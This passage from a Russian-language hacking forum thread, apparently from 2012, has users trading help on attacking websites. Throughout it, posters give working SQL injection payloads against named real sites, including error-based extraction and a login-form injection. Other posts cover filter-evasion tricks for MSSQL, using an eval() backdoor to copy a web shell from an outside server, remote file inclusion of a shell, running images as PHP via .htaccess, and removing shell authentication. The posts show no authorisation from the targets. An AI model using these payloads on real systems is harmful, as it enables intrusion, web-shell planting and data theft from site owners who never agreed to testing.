конкретизируй свой вопрос.. там много разных сплоитов, на разных языках


например, http://www.exploit-db.com/exploits/22766/

Prosta4ok
18.11.2012, 01:14
seozone said:
например, http://www.exploit-db.com/exploits/22766/


там просто SQLi через GET запрос и перечислены уязвимые переменные

seozone
18.11.2012, 01:20
Prosta4ok said:
там просто SQLi через GET запрос и перечислены уязвимые переменные


покажи пример в пм)

vaddd
18.11.2012, 01:22
Konqi said:
ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать
читаем статью нолика. несколько раз.


можно линк? не могу найти...

justonline
18.11.2012, 01:27
Есть форма добавления объявления. Вставляю кавычку в пост запрос и получаю.


item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0', '25', '0', '25', '123', '0')' at line 16


если делаю так '+order+by+2+--+ пишет -


item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+2+--+', '0', '25', '0', '25', '123', '0')' at line 16


Пробовал без кавычки определить кол-во полей, но Проблема в том, что после пост запроса подгружается другая страница, которая возникает при правильном запросе.

Что попробовать, как быть?

p.s. Корыстных целей не преследую, ресурс закрытый и направленности совсем не интересная широкой публике. Бага будет сдана сразу админу.

VY_CMa
18.11.2012, 01:36
justonline, inj в insert, свои методы.

/thread35207.html (https://antichat.live/threads/35207/)

justonline
18.11.2012, 01:51
VY_CMa said:
justonline
, inj в insert, свои методы.
/thread35207.html (https://antichat.live/threads/35207/)


точно) что-то мой пияный моск не сообразил, что тут запись а не select)

Prosta4ok
18.11.2012, 01:55
seozone said:
покажи пример в пм)


так там все расписано, какой еще пример?

ищешь сайт с уязыимым скрптом, подставляешь


Code:
сайт/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--

если показывает версию БД знач все пучком и можно крутить скулю дальше

justonline
18.11.2012, 02:30
VY_CMa said:
justonline
, inj в insert, свои методы.
/thread35207.html (https://antichat.live/threads/35207/)




Select * from dle_users where user_id = 292+order+by+1+--+2 Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--+' at line 1


из той же оперы? опять пост, но вот смущает Select, правда почему, интересно он выводится в ошибке...

Alert
18.11.2012, 17:32
Вопрос, как эксплуатировать бекдор eval ($_REQUEST['a']); ?

Попробовал на локалхосте выполнить http://localhost/test.php?a=http://test1/wso2_pack.php

выдает ошибку


Parse error: syntax error, unexpected ':' in .....\localhost\test.php(15) : eval()'d code on line 1


соответственно бекдор прописан на 15 строчке

Pirotexnik
18.11.2012, 18:12
eval ($_REQUEST['a']);


После eval пробела быть не должно.


http://localhost/test.php?a=http://test1/wso2_pack.php


щито? eval - выполняет PHP код!

Юзай например так:


test.php?a=copy("http://site.com/you_wso.
TXT
","./wso.php");


Эта функция скопирует текствовый файл с сервера, и сохранит его рядом с test.php под именем wso.php

Обрати внимание, MQ должно быть off, иначе кавычки проэкранируются. Тогда нужно будет юзать base64.

winstrool
18.11.2012, 20:07
Pirotexnik said:
После eval пробела быть не должно.
щито? eval - выполняет
PHP
код!
Юзай например так:
Эта функция скопирует
текствовый
файл с сервера, и сохранит его рядом с test.php под именем wso.php
Обрати внимание, MQ должно быть off, иначе кавычки проэкранируются. Тогда нужно будет юзать base64.


не обязательно юзать base64 если хочется видеть читабельный вид для глаза, то можно сделать так:


PHP:
test.php?a=copy($_GET[a],$_GET[b])&a=http://site.com/you_wso.TXT&b=wso.php

а чтобы обойти MQ можно в мини шеле заюзать stripslashes()


но опять же если юзать base64 то просматривающего админом логи смогут завести его в заблуждение)

aadktnbaov
18.11.2012, 21:45
дядьки, подскажите как в MS-SQL делать запросы БЕЗ ПРОБЕЛОВ

уж очень не хочется заморачиваться с устанавливкой и освоением MS-SQL

я так понимаю, что в MS-SQL при нормальном (НЕ-инъекции) использовании запрос

select(varXXXX)from(tblXXX)

не будет работает ?

у меня, например , SQL-инъекция с вышеупомянутым запросом "валится" с ошибкой 500 (отчёт об ошибках отключен, подробности не узнать...)

НО , например, запрос

select(@@version))

или

(db_name())

успешно "вытягивает" инфу из базы

Всё , что я научился сейчас "вытягивать" с базы , - это получение информации из встроенных функций Transact-SQL, описанных здесьhttp://msdn.microsoft.com/ru-ru/library/ms174318.aspx

например

(current_user)

(user)

(system_user)

(original_login())

и т.д.

но этого ,естесственно, мало

что вообще максимум можно поиметь, если sql-инъекция в MS-SQL возможна, но ТОЛЬКО БЕЗ ПРОБЕЛОВ ???

P.S.

пробелы скриптом ТОЧНО режутся

запрос вида

(select('qwe rty'))

успешно вернул мне

qwe%20rty

просто браузер каждый пробел в GET-запросе преобразует в %20 ,

и SQL-запрос с этими %20 прямо в таком виде и ПЫТАЕТСЯ выполниться, естесственно, с ошибкой ( http 500 )

P.P.S.

http://msdn.microsoft.com/ru-ru/library/ms178623(v=sql.100).aspx

использование комментариев вида /**/ вместо пробела в моем случае исключено

т.к. get-параметры передаются через косую черту, т.е. вот так

http://hostname/path/param1/param2/param3/param4/param5/

и использование комментариев вида /**/ приводит к ошибке

BigBear
18.11.2012, 22:51
что вообще максимум можно поиметь, если sql-инъекция в MS-SQL возможна, но ТОЛЬКО БЕЗ ПРОБЕЛОВ ???


В MSSQL в качестве пробелов проходят следующие конструкции

+,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10, 11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20,%

Юзать примерно так

SELECT%01column%02FROM%03table;

+or+1=1 ну и так далее....

Ещё есть такая вариация

SELECT"table_name"FROM[information_schema].[tables]

aadktnbaov
18.11.2012, 23:17
BigBear said:
В MSSQL в качестве пробелов проходят следующие конструкции
+,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10, 11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20,%
Юзать примерно так
SELECT
%01
column
%02
FROM
%03
table;
+
or
+
1=1 ну и так далее....
Ещё есть такая вариация
SELECT
"
table_name
"
FROM
[
information_schema
].[
tables
]



если мой get-запрос содержит знак плюса, тогда ошибка такая

Server Error

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

Причем неважно в каком месте get-запроса находится знак плюса - даже внутри кавычек селекта

http://hostname/path/param1/(select('1+1'))/param3/param4/

вываливается вышеуказанная ошибка

хотя если знак плюса заменить на другой - будет всё ОК

http://hostname/path/param1/(select('1%1'))/param3/param4/

с процентами с любыми не хочет работать

т.е. get-запрос

http://hostname/path/param1/(select%20'qwerty'))/param3/param4/

приводит к http-ошибке 500

квадратные скобки [] в GET-запросе браузер автоматически переделывает в %5B и %5D

и опять-же, запрос с процентами не "кушает" и выдаёт 500-ую ошибку

скачал себе с официального сайта ms-sql 2012 ( как у жертвы )

целый час качалось

теперь уже час устанавливается

буду тестировать оригинальные запросы типа

select%20'qwerty'

что-то мне подсказывает, что такие запросы не будут выполняться....

установил-таки MS-SQL 2012

запрос

select%20'qwerty'

вызвал ошибку

Сообщение 102, уровень 15, состояние 1, строка 1

Неправильный синтаксис около конструкции "20".

и все другие запросы с % в MSSQL 2012 тоже не работают:

select%01'qwerty'

select%02'qwerty'

select%03'qwerty'

select%04'qwerty'

...

select%20'qwerty'

запрос

select(table_name)from INFORMATION_SCHEMA.TABLES

в MSSQL 2012 отлично работает

но запросы

select(table_name)from (INFORMATION_SCHEMA.TABLES)

select(table_name)from(INFORMATION_SCHEMA.TABLES)

в MSSQL 2012 вызывают ошибку

Сообщение 102, уровень 15, состояние 1, строка 1

Неправильный синтаксис около конструкции ")".

BigBear
18.11.2012, 23:23
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.

Там кстати я ещё обновил информацию.

aadktnbaov
18.11.2012, 23:27
BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.



я уже заметил и тоже обновил свой ответ

спасибо за посильную помощь

aadktnbaov
18.11.2012, 23:31
BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.



у Вас (или у кого-нибудь ещё) есть возможность проверить - выполняется ли в оригинале на MS-SQL 2012 запрос вида

(select(varXXX)from(tableXXX))

т.е. вместо пробелов - скобки

?

aadktnbaov
18.11.2012, 23:49
BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.



это не WAF срабатывает

читайте мой пост выше

я его (тот пост) в очередной раз обновил....

BigBear
19.11.2012, 08:22
aadktnbaov said:
запрос
select(table_name)from INFORMATION_SCHEMA.TABLES
в MSSQL 2012 отлично работает
но запросы
select(table_name)from (INFORMATION_SCHEMA.TABLES)
select(table_name)from(INFORMATION_SCHEMA.TABLES)
в MSSQL 2012 вызывают ошибку
Сообщение 102, уровень 15, состояние 1, строка 1
Неправильный синтаксис около конструкции ")".


А квадратные скобки пробовал?

aadktnbaov
19.11.2012, 12:30
BigBear said:
А квадратные скобки пробовал?


написал же

квадратные скобки [] в GET-запросе браузер автоматически переделывает в %5B и %5D

и опять-же, запрос с процентами не "кушает" и выдаёт 500-ую ошибку

P.S.

использовал браузеры IE , FireFox , Opera

можно еще Safari и Chrome установить ради такого дела, но что-то мне подсказывает, что они тоже будут скобки [] в GET-запросе автоматически переделывать в %5B и %5D

интересно, как не используя браузеры , т.е. програмно (Delphi) , отправить сайту get-запрос с квадратными скобками , а не %5B и %5D ?

и отработает ли он ?

P.P.S.

вчера в специально для таких целей установленной Microsoft SQL Server Management Studio "выдрочил" тысячи запросов

на моё удивление запрос

(select(table_name)from.information_schema.tables)

успешно отработал

( т.е. название таблицы information_schema.tables отделяем от from точкой )

но теперь никак не могу приделать к этой конструкции "where" , чтобы результат возвращал одну строку, а не столбец значений

у кого есть мысли по этому поводу ?

запрос

(select top(1)(table_name)from.information_schema.tables)

( между select и top находится пробел ) в моей Microsoft SQL Server Management Studio успешно выполняется

пока не придумал как убрать этот пробел между select и top

у кого есть мысли по этому поводу ?

Hapk
19.11.2012, 13:11
Подскажите плиз как можно раскрутить скулу

вот есть сайт

http://site.com/?cnt=articles&item=1 я подставляю кавычку ' ОШИБКИ нету

а вот когда подставляю слеш \ то выскакивает вот такая ошибка

Fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?cnt=articles&item=1\'' at line 1 : SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1\' in /home/site/public_html/classes/TObj.php on line 106

Можно ли её раскрутить?

winstrool
19.11.2012, 13:27
Hapk said:
Подскажите плиз как можно раскрутить скулу
вот есть сайт
http://site.com/?cnt=articles&item=1 я подставляю кавычку ' ОШИБКИ нету
а вот когда подставляю слеш \ то выскакивает вот такая ошибка
Fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?cnt=articles&item=1\'' at line 1 : SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1\' in /home/site/public_html/classes/TObj.php on line 106
Можно ли её раскрутить?


а на реальный url можно взглянуть? думаю тут вывод в error будет...

P.S: да думаю тут и бональным способом вывести можно.

если кавычка не слешируется то:

SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1' and 1=1#'

Pirotexnik
19.11.2012, 18:13
Hapk, прикольно. Скорее всего там либо режутся кавычки, либо экранируются.

т.к. запрос бы был таким:


SELECT url FROM air_redirect WHERE url_src =
'
/?cnt=articles&item=1
'
'


и ошибка была бы.

Попробуй следующее:

1 - потести на логику, как предложил winstrool

2 - error based

3 - если не получится - скинь линк в личку

Hapk
19.11.2012, 19:56
winstrool said:
а на реальный url можно взглянуть? думаю тут вывод в error будет...
P.S: да думаю тут и бональным способом вывести можно.
если кавычка не слешируется то:
SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1'
and 1=1#'


Отправил юрл в личку

chiper1
19.11.2012, 20:10
подскажите, как найти вход в базу данных MySQL >=5

MaxFast
19.11.2012, 20:15
chiper1 said:
подскажите, как найти вход в базу данных MySQL >=5


Попробуй по 3306 порту, может быть где-то в другом месте phpmyadmin.

Creator000
19.11.2012, 23:40
с чего начать изучение xss атак?

qaz
19.11.2012, 23:53
Creator000 said:
с чего начать изучение xss атак?


с чтения статей

Creator000
20.11.2012, 00:07
qaz said:
с чтения статей


киньте, пожалуйста, ссылки. а wtb-программирование ведь нало знать да?

qaz
20.11.2012, 00:19
Creator000 said:
киньте, пожалуйста, ссылки. а wtb-программирование ведь нало знать да?


google.com

aadktnbaov
21.11.2012, 00:00
Hapk said:
Подскажите плиз как можно раскрутить скулу
вот есть сайт
http://site.com/?cnt=articles&item=1 я подставляю кавычку ' ОШИБКИ нету
а вот когда подставляю слеш \ то выскакивает вот такая ошибка
Fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?cnt=articles&item=1\'' at line 1 : SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1\' in /home/site/public_html/classes/TObj.php on line 106
Можно ли её раскрутить?



"раскрутили" ?

я знаю сайт с подобной "дырой"

( см. мой пост /showthread.php?p=3340983&posted=1#post3340983 )

Creator000
21.11.2012, 00:22
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?

ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?

Prosta4ok
21.11.2012, 01:33
Creator000 said:
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?


ставь локальный сервер и тесть сколько влезет


Creator000 said:
Интересно, с помощью xss можно в текст вставить картинку?


можно сделать все что умеет JS

Creator000
21.11.2012, 15:48
ставь локальный сервер и тесть сколько влезет


а чат где мне взять?

qaz
21.11.2012, 16:20
Creator000 said:
а чат где мне взять?


скачать денвер и усановить на комп

Prosta4ok
21.11.2012, 16:55
Creator000 said:
а чат где мне взять?


все там же -> google.com

qaz
21.11.2012, 17:53
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent='

чёт немогу скулю разкрутиь((

BigBear
21.11.2012, 21:11
OxoTnik said:

HTML:
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+Group+by+11


HTML:
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1%20AND%20%28SELECT%205534%20FROM% 28SELECT%20COUNT%28*%29,CONCAT%280x3a666f733a,%28S ELECT%20MID%28%28IFNULL%28CAST%28schema_name%20AS% 20CHAR%29,0x20%29%29,1,50%29%20FROM%20INFORMATION_ SCHEMA.SCHEMATA%20LIMIT%201,1%29,0x3a7172693a,FLOO R%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHE MA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29

ppcompany_zu


Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.

А привести в читабельный вид слабо ?

З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.

winstrool
21.11.2012, 21:28
BigBear said:
Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.
А привести в читабельный вид слабо ?
З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.


BigBear так пойдет?

http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+OR+(SELECT+COUNT(*)+FROM+(SELECT +1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT (MID((select+concat_ws(0x3a,user()),version(),data base())),1,63)+,+ FLOOR(RAND(0)*2)))#

P.S: У меня браузер как то сам в урленкод кидает когда, капирую с адресной строки...

Creator000
21.11.2012, 21:35
Народ где взять чат на котором можно потестировать уязвимости?

seozone
21.11.2012, 22:05
Вообщем такой вопрос, залил картинку в аватары на форуме, мне нужен полный путь к аватару, а там так


/forum/image.php?u=3138&dateline=135229


а как получить полную ссылку?

ReV0LVeR
22.11.2012, 16:27
Microsoft SQL Server

2008 (SP2) - 10.0.4000.0 (Intel X86)

Sep 16 2010 20:09:22 Copyright (c)

1988-2008 Microsoft Corporation

Enterprise Edition on Windows NT 6.0 (Build 6002: Service Pack 2)

(VM)

как выполнять команды в Microsoft SQL Server 2008 через mssql inj? например x p _ c m d s h e l l , какой должен стоять префикс вместо хp?

blesse
22.11.2012, 18:55
немогу разобраться в wp где в дб посмотреть у какого юзера привы админа?у id=1 нету

Prosta4ok
22.11.2012, 19:13
вроде где-то в таблице wp_usermeta

MaxFast
22.11.2012, 19:54
blesse said:
немогу разобраться в wp где в дб посмотреть у какого юзера привы админа?у id=1 нету


Таблица wp_users, поле user_status

Вроде как так.

blesse
22.11.2012, 20:13
User status че там? у всех нули..usermeta догадываюсь ,но не смог разобраться.вобщем вопрос-актуален

BigBear
23.11.2012, 00:03
blesse said:
немогу разобраться в wp где в дб посмотреть у какого юзера привы админа?у id=1 нету


wp_users -> user_level

Уровень админа = 10 (на старой версии, на новой пока нет Интернета проверить =/ )

infoseller
23.11.2012, 10:44
Совет

Есть скуля, бд из под рута, виндовый сервак, стоит XAMPP, файловые привилеги есть, папки на запись нет, в phpinfo временного файла нет, magic_quotes ON, phpmyadmin нет, админка из локалки, рдп есть. Пробовал хэши вытащить, из repair не подходит...

Нужен шелл, есть идеи?

GroM88
23.11.2012, 11:46
Похожая проблема

Есть скуль) права рут, file_priv Y, Сервак на винде ISS

Есть папка на запись, phpmyadmin нету = \ удаленно не подконектишся к бд

Проблема в magic_quotes ON

Есть варианты как залить? : )

BigBear
23.11.2012, 14:07
На оба вопроса ответ - Да, но при наличии внутреннего запроса. (метод Scipio)

Expl0ited
23.11.2012, 14:38
BigBear said:
На оба вопроса ответ - Да, но при наличии внутреннего запроса. (метод Scipio)


У него не метод, а вероятная возможность. Условие очень жесткое, что бы результат запроса в базу, в котором есть уязвимость, участвовал в другом запросе. На практике такое встречается не так часто как хотелось бы.

blesse
23.11.2012, 14:50
BigBear said:
wp_users -> user_level
Уровень админа = 10 (на старой версии, на новой пока нет Интернета проверить =/ )


К сожалению у меня версия 3.3.1 там колонки юсерлевл нету

infoseller
23.11.2012, 15:51
to GroM88

Нашел пост Scipio /showpost.php?p=663815&postcount=39 попробуй. Мне, к сожалению, не подходит...

DeepXhadow
24.11.2012, 04:19
можно что-то сделать с инъекцией в лимит?

К примеру, типа этого

www.e-tobaccos.com/buy-cigars/advanced_search_result.php?amp;currency=USD&language=en&manufacturers_id=20&operator=or&sort=@@D4d

Vankoo
25.11.2012, 17:54
есть Блинд инъекция, но сайт банит за частые попытки подключения. Вообщем как можно слить БД еще?) найти лог и пасс от чего то и залить шел? или что моно сделать?

Сори но я нуп в этом пока что. заранее спасибо

seozone
25.11.2012, 23:42
Кто подскажет как сделать картинку-шелл, т.е foto.jpg/.php

думаю вы поняли про какой баг я имею ввиду, просто так если тупо код шелла втыкивать в картинку, то картинка перестаёт работать

winstrool
26.11.2012, 07:52
seozone said:
Кто подскажет как сделать картинку-шелл, т.е foto.jpg/.php
думаю вы поняли про какой баг я имею ввиду, просто так если тупо код шелла втыкивать в картинку, то картинка перестаёт работать


пробуй так


PHP:
AddType application/x-httpd-php.jpg

AddHandler application/x-httpd-php.jpg

или так


PHP:


AddType application/x-httpd-php.jpg

matvejcik
26.11.2012, 08:42
/?id=%40%40g3YlL&strana=content как правильно вывести базу данных??sql map ниче не выводит.mysql сервер

BigBear
26.11.2012, 12:44
Vankoo said:
есть Блинд инъекция, но сайт банит за частые попытки подключения. Вообщем как можно слить БД еще?) найти лог и пасс от чего то и залить шел? или что моно сделать?
Сори но я нуп в этом пока что. заранее спасибо


Увеличить таймаут между запросами.

З.Ы. На глупые вопросы - глупые ответы.

З.Ы.Ы. Всё зависит от ситуации и куууууучи факторов.

seozone
27.11.2012, 00:40
winstrool said:
пробуй так

PHP:
AddType application/x-httpd-php.jpg

AddHandler application/x-httpd-php.jpg

или так

PHP:


AddType application/x-httpd-php.jpg





нет, вот сама бага

http://habrahabr.ru/post/100961/

MorganFr
27.11.2012, 19:09
помогите, тут есть инъекция


Code:
http://sdelanounas.ru/blogs/all/?page=-1

если есть то как раскрутить

+ ещё


Code:
http://sdelanounas.ru/blogs/21928/?pid=-185629

BigBear
27.11.2012, 23:34
MorganFr said:
помогите, тут есть инъекция

Code:
http://sdelanounas.ru/blogs/all/?page=-1

если есть то как раскрутить


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 8

Тут инъекция в LIMIT

C учётом того, что в запросе присутствует ORDER BY провести инъекцию неполучится.

XAMEHA
28.11.2012, 03:07
BigBear said:
Тут инъекция в LIMIT


Там нет инъекции.

MorganFr
28.11.2012, 11:33
BigBear said:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 8
Тут инъекция в LIMIT
C учётом того, что в запросе присутствует ORDER BY провести инъекцию неполучится.


Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?


Code:
http://www.sdelanounas.ru/index/loginPage/

Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:


Code:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1

Пробовал в Haviji POST запросом, ничего не вышло.

BigBear
28.11.2012, 13:12
MorganFr said:
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?

Code:
http://www.sdelanounas.ru/index/loginPage/

Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:


Подозреваю что тут инъекция точно присутствует.

Во всяком случае при использовании ' or 1='1 сервер не ругался.

Так как вывода нет, решил попробовать Time-Based SQL, но sleep(2) отправил сервер в даун... Теперь жду пока оживёт

З.Ы. Забудь про HAVIJ - он не обойдёт за тебя WAF и не определит фильтры. Его можно юзать как дампер, когда полностью готов вектор атаки и есть все данные, но не как "Утилиту для авто-похека".

Cennarios
28.11.2012, 13:39
Добрый. Суть: при выборке вида -> +or+1+group+by+concat( (select+user()+from+web-blog.wp_users+limit+0,1),floor(rand(0)*2)) having min(0)--+ , плюется во так : right syntax to use near '-blog.wp_users. Те, крашится на дефисе в названии базы. Мысли?

KolosJey
28.11.2012, 16:43
Cennarios said:
Добрый. Суть: при выборке вида -> +or+1+group+by+concat( (select+user()+from+web-blog.wp_users+limit+0,1),floor(rand(0)*2)) having min(0)--+ , плюется во так : right syntax to use near '-blog.wp_users. Те, крашится на дефисе в названии базы. Мысли?


`web-blog`.wp_users

MorganFr
28.11.2012, 17:43
MorganFr said:
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?

Code:
http://www.sdelanounas.ru/index/loginPage/

Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:

Code:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1

Пробовал в Haviji POST запросом, ничего не вышло.




BigBear said:
Подозреваю что тут инъекция точно присутствует.
Во всяком случае при использовании ' or 1='1 сервер не ругался.
Так как вывода нет, решил попробовать Time-Based SQL, но sleep(2) отправил сервер в даун... Теперь жду пока оживёт
З.Ы. Забудь про HAVIJ - он не обойдёт за тебя WAF и не определит фильтры. Его можно юзать как дампер, когда полностью готов вектор атаки и есть все данные, но не как "Утилиту для авто-похека".


не получилось у меня в ручную ничего сделать, знаний не хватает. Может кто поможет, мне даже не важен хеш админа, но очень нужно раскрытие полного пути к скрипту.

Expl0ited
28.11.2012, 18:26
MorganFr said:
Спасибо, а вот тут такого рода ошибку нашёл, это тоже самое?

Code:
http://www.sdelanounas.ru/index/loginPage/

Если в поле логин ввести одинарную ковычку ' и любой пароль, то выводит ошибку:

Code:
SELECT * FROM users WHERE login=#user AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdomain = 1)) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ggh'' AND (domain="sdelanounas.ru" OR (domain != "sdelanounas.ru" AND crossdoma' at line 1

Пробовал в Haviji POST запросом, ничего не вышло.


login=' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having( min(0)or(1))#

password=1

Duplicate entry '5.0.51a-24+lenny5-log' for key 1

ReV0LVeR
28.11.2012, 20:27
m.gortransperm.ru/time-table/12+order+by+1/13403 pgsql , order by 1 с ошибкой?!

Fooog
30.11.2012, 19:46
Code:
http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,3,4,5,6,7,8,9,10,11+--

Логинов/паролей нету, как и самой админки


Code:
http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,File_Priv,4,5,6,7,8,9,10,11+f rom+mysql.user--

Это понимать как то что нету привилегий, или как то что что-то не так? Можно ли шелл залить?

winstrool
30.11.2012, 21:05
Fooog said:

Code:
http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,3,4,5,6,7,8,9,10,11+--

Логинов/паролей нету, как и самой админки

Code:
http://testrrrrrrru-online.ru/?video=-989+union+select+1,2,File_Priv,4,5,6,7,8,9,10,11+f rom+mysql.user--

Это понимать как то что нету привилегий, или как то что что-то не так? Можно ли шелл залить?


Во первых, у вас нет ни файловых привилегий, ни доступа к mysql.user, с чего вы вообще решили возможность в таком случае файловых привилегий?!

Во вторых, в бд ничего нет похожего связаного с доступом к админке


_ttp://testrrrrrrru-online.ru/?video=%27-989%27+union+select+1,2,%28select%28@x%29from%28se lect%28@x:=0x00%29,%28select%280%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29,4,5,6,7,8 ,9,10,11+--+

vaddd
30.11.2012, 21:32
http://site.ru/index.php?http://myserver.ru/sys12.txt

вижу свой шелл всо2, авторизируюсь - вижу листинг директорий

при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла

вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие:

пытаюсть залиться туда wgetом - результата нет

пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect(

сервак поидее можно порутать, FreeBSD 3.3-RELEASE

winstrool
30.11.2012, 21:39
vaddd said:
http://site.ru/index.php?http://myserver.ru/sys12.txt
вижу свой шелл всо2, авторизируюсь - вижу листинг директорий
при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла
вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие:
пытаюсть залиться туда wgetом - результата нет
пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect(
сервак поидее можно порутать, FreeBSD 3.3-RELEASE


Попробуй залить шелл без пасса...

Faaax
30.11.2012, 21:40
попробуй убери из кода шелла саму авторизацию,бывает помагает

vaddd
30.11.2012, 21:46
в каких шеллах можно отключить авторизацию поменяв значение переменной по типу

auth_enabled=false;?

Faaax
30.11.2012, 21:51
vaddd said:
в каких шеллах можно отключить авторизацию поменяв значение переменной по типу
auth_enabled=false;?


попробуй этот

http://pastebin.com/c35GqLPx

igumenov
01.12.2012, 04:49
Как можно использовать эту ошибку?


Warning: pg_query(): Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^ in /srv/www/htdocs/!sites/index.php on line 246 Query failed: ERROR: syntax error at or near "LIMIT" LINE 1: SELECT name FROM web_area.menu WHERE id= LIMIT 1 ^

BigBear
01.12.2012, 10:03
vaddd said:
http://site.ru/index.php?http://myserver.ru/sys12.txt
вижу свой шелл всо2, авторизируюсь - вижу листинг директорий
при попытке совершить действия какие-либо, выкидывает на форму ввода пароля у шелла
вижу директорию news с правами drwxrwxrwx - забиваю на шелл, пишу код под каждое конкретное действие:
пытаюсть залиться туда wgetом - результата нет
пытаюсь переименовать news/index.php - в .txt, что бы почитать код (там нет майсику.ль значит пасс в коде) - open basedir restriction каtaking effect(
сервак поидее можно порутать, FreeBSD 3.3-RELEASE


+ поставь действие по умолчанию в шелле - консолька, и через неё совершай действия.


Как можно использовать эту ошибку?
Цитата:
